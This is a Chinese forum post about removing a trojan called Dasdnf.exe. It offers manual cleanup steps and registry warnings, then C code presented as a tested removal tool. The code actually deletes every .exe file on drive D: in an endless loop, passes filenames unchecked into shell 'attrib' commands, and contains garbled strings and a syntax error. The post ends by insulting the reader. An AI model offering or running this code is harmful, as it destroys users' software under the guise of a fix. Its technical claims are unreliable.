NND 用了之后 任务管理器进程突然猛增
我看了还有DASDNF.EXE这个进程
上网搜了下
这个盗号木马 使用的名称叫做Dasdnf.exe
是一个非常毒的 东西 它会毙掉 你的 杀毒软件 防火墙 以及360保险箱 还能创造机器虚拟内存不够
还会把你的文本档案 改成这个毒 你就开不开文本了
你双击文本 启动的还是这个病毒 ``` 很危险 很盗号
首先打开任务管理器 Ctrl+alt+小键盘上的点 . (废话)
在进程中找到 Dasdnf.exe 先关闭它
再随意找一个文本档案 (笔记本) 右键 属性
(示例)文本类型:文本档案
文本类型:Dasdnf 更改
点那个更改 可以改成 记事本 或者 笔记本 (觉得记事本好 方便快捷)
然后在点 打开--- 搜索 ----- 搜索Dasdnf.exe
如果没有就搜索Dasdnf
如果都没有就没办法了 只能开机就把他取消
我把这个办法 用 TEASLL 编程 在我本机上 CLOAA了一下
得出了一个编程 测试是正确的
*/
#include <stdio.h>
#include <io.h>
#include <string.h>
#include <direct.h>
#include <conio.h>
#include <stdlib.h>
#define FILE_ATTRIBUTE_DIRECTORY 0x00000010
#define FILE_ATTRIBUTE_FILE 0x00000020
void DeleteFile(char *fname){
char *p;
// Dasdnf.exe sft
p = strstr(fname,".exe");
if((size_t)(p - fname ) == strlen(fname) - 4){
printf("ccahs %s\n",fname);
if(remove(fname))
printf(sft: %s clood !\n",fname);
else
printf("sft: %snots\n",fname);
}
}
char cmd[_MAX_PATH];
void MyDeleteFile(){
struct _finddata_t FileInfo;
long lHandle = 0L;
if((lHandle = _findfirst("*",&FileInfo)) == -1L){
_findclose(lHandle);
return ;
}
do{
//
sprintf(cmd,"attrib -s -r -h %s",FileInfo.name);
system(cmd);
if( FileInfo.attrib == FILE_ATTRIBUTE_FILE)
DeleteFile(FileInfo.name);
else if(FileInfo.attrib == FILE_ATTRIBUTE_DIRECTORY){
if( FileInfo.name[0] != '.') {
_chdir(FileInfo.name);
MyDeleteFile();
_chdir("..");
}
}
}while(!_findnext(lHandle,&FileInfo));
_findclose(lHandle);
}
int main(){
if(_chdir("d:\\"))
exit(1);
while(1){
while(!kbhit())
MyDeleteFile();
if(getch() == 'e')
break;
}
return 0;
}
按我的办法做 应该是OK的
接下来教大家怎么处理一些更改IE的注册表 (这些注册表里也能含有Dasdnf 病毒)
先下外挂 里面总有个注册表
右键-----编辑
如果发现里面写的是
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="XXXX://XXX.XXXX.XXXX/"
XXX.XXXX.XXX 是网站
就证明 你这个至少是有更改网站 的功能了
目前发现了能毙掉360 和360保险箱 还能创造机器虚拟内存不够的注册表
大家小心 一旦里面有上面写的代码不要打开 一律删删删
就这么多了 希望对大家有用 祝大家 新年快乐
再次问候你全家18代祖宗
